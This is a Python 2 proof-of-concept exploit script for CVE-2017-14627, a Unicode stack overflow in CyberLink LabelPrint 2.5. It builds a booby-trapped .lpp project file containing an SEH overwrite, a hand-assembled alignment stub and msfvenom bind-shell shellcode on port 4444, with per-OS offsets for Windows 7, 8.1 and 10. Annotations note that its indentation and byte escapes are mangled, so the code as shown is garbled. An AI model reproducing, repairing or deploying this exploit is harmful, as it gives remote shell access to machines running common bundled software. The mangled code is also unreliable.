#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# This proof of concept is based on the LabelPrint 2.5 that comes with the Power2Go installation.

# Proof-of-concept file generator for CVE-2017-14627 (see the header above): writes
# a LabelPrint .lpp project file whose <TRACK name="..."> attribute is oversized.
# Reads the module-level globals align, align2, junk1 and junk2, which are only
# assigned by the OS menu at the bottom of the script, so calling exp() before a
# target has been chosen raises NameError.
# NOTE(review): this transcription is garbled -- indentation has been lost and the
# string escape sequences appear mangled -- so the block does not run as shown.
def exp():
# Decodes to the XML opening of a LabelPrint project:
# <PROJECT version="1.0.00"> followed by an <INFORMATION ...> element.
header = ("x3cx50x52x4fx4ax45x43x54x20x76x65x72x73x69x6fx6e"
"x3dx22x31x2ex30x2ex30x30x22x3ex0ax09x3cx49x4ex46"
"x4fx52x4dx41x54x49x4fx4ex20x74x69x74x6cx65x3dx22"
"x22x20x61x75x74x68x6fx72x3dx22x22x20x64x61x74x65"
"x3dx22x37x2fx32x34x2fx32x30x31x37x22x20x53x79x73"
"x74x65x6dx54x69x6dx65x3dx22x32x34x2fx30x37x2fx32"
"x30x31x37x22x3e")
# Output file name; written relative to the current working directory.
filename2 = "labelprint_poc_universal.lpp"
# NOTE(review): opened here but only closed on the last line of exp(); any
# exception raised in between leaks the handle (no with/try-finally).
f = open(filename2,'w')
# 790 filler characters precede the nSEH/SEH values in the final payload
# (see the concatenation order in `payload` below).
junk = "A" * 790
# SEH record overwrite values. `nop` is also documented by the author's inline
# comments below as doubling as an x86 "inc edx".
nseh = "x61x42"
seh = "x2cx44"
nop = "x42"

# Encoder output taken verbatim from the msfvenom command below; per the menu
# text at the bottom of the script it is a bind shell listening on TCP 4444.
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"


# Hand-assembled stub placed between the SEH values and the encoded buffer.
# The author's inline comments document each opcode; the pieces marked
# "depending OS" are the globals (junk1, junk2, align, align2) set by the menu.
#preparing address for decoding
ven = nop #nop/inc edx
ven += "x54" #push esp
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += "x05x1Bx01" #add eax 01001B00 universal
ven += nop #nop/inc edx
ven += "x2dx01x01" #sub eax 01001000
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += nop #nop/inc edx
ven += "x5c" #pop esp

#we need to encode the RET address, since C3 is bad char.
#preparing ret opcode
ven += nop #nop/inc edx
ven += "x25x7ex7e" #and eax,7e007e00
ven += nop #nop/inc edx
ven += "x25x01x01" #and eax,01000100
ven += nop #nop/inc edx
ven += "x35x7fx7f" #xor eax,7f007f00
ven += nop #nop/inc edx
ven += "x05x44x44" #add eax,44004400
ven += nop #nop/inc edx
ven += "x57" #push edi
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += junk2 #depending OS

#custom venetian
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += align #depending OS
ven += nop #nop/inc edx
ven += "x2dx01x01" #add eax, 01000100 #align eax to our buffer
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += nop #nop/inc edx

#call esp 0x7c32537b MFC71U.dll
ven += "x5C" #pop esp
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += "x05x53x7c" #add eax 7c005300 part of call esp
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += junk1 #depending OS
ven += "x7bx32" #part of call esp

#preparing for shellcode
ven += nop * 114 #junk
ven += "x57" #push edi
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += align2 #depending OS
ven += nop #nop/inc edx
ven += "x2dx01x01" #sub eax,01000100
ven += nop #nop/inc edx
ven += buf #shellcode

# Pad with nop characters so the attribute value is exactly 15000 characters.
# A TRACK name attribute of this size in an .lpp file is the observable
# signature of this PoC and a simple thing for a file scanner to flag.
sisa = nop * (15000-len(junk+nseh+seh+ven))
payload = junk+nseh+seh+ven+sisa
# Decodes to: <tab><tab><TRACK name=" + payload + "/> (the overflow sits in the
# name attribute of the TRACK element).
bug="x09x09x3cx54x52x41x43x4bx20x6ex61x6dx65x3d"+'"'+payload+'"'+"/> "
# Closing tags: <tab></INFORMATION><newline></PROJECT>
bug+=("x09x3cx2fx49x4ex46x4fx52x4dx41x54x49x4fx4ex3ex0a"
"x3cx2fx50x52x4fx4ax45x43x54x3e")
# Header and body are joined by a single space and written in one call.
f.write(header+ " " + bug)

# Python 2 print statements (this script is not Python 3 compatible).
print "[+] File", filename2, "successfully created!"
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
print "[*] Good luck ;)"
f.close()

# Interactive entry point: prints a banner, asks for a target OS, sets the
# OS-specific globals that exp() reads, then generates the PoC file.
# Python 2 throughout (print statements, eval-style input()).
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <-------------------------------------------------> "
print " 1.Windows 7 x86 bindshell on port 4444"
print " 2.Windows 8.1 x64 bindshell on port 4444"
print " 3.Windows 10 x64 bindshell on port 4444 "
# NOTE(review): rebinds the builtin name `input` to the user's answer. Under
# Python 2 (implied by the print statements) input() evaluates the typed text,
# which is why the integer comparisons below can match.
input = input("Choose Target OS : ")
try:
# Each branch assigns the module-level globals consumed by exp(): align, align2,
# junk1 and junk2. NOTE(review): the "add eax" comments are identical across the
# three branches even though the byte values differ, so they look copy-pasted;
# treat the bytes, not the comments, as authoritative.
if input == 1:
align = "x05x09x01" #add eax,01000400
align2 = "x05x0Ax01" #add eax, 01000900
junk1 = 'x42' * 68 #junk for win7x86
junk2 = 'x42' * 893 #junk for win7x86
exp()
elif input == 2:
align = "x05x09x01" #add eax,01000400
align2 = "x05x0Ax01" #add eax, 01000900
junk1 = 'x42' * 116 #junk for win8.1x64
junk2 = 'x42' * 845 #junk for win8.1x64
exp()
elif input == 3:
align = "x05x05x01" #add eax,01000400
align2 = "x05x06x01" #add eax, 01000900
junk1 = 'x42' * 136 #junk for win10x64
junk2 = 'x42' * 313 #junk for win10x64
exp()
else:
print "Choose the right one :)"
# NOTE(review): the bare except swallows every error raised by the menu or by
# exp() -- e.g. IOError from open(), or NameError/ValueError -- and prints an
# empty line, so any failure is invisible to the user.
except:
print ""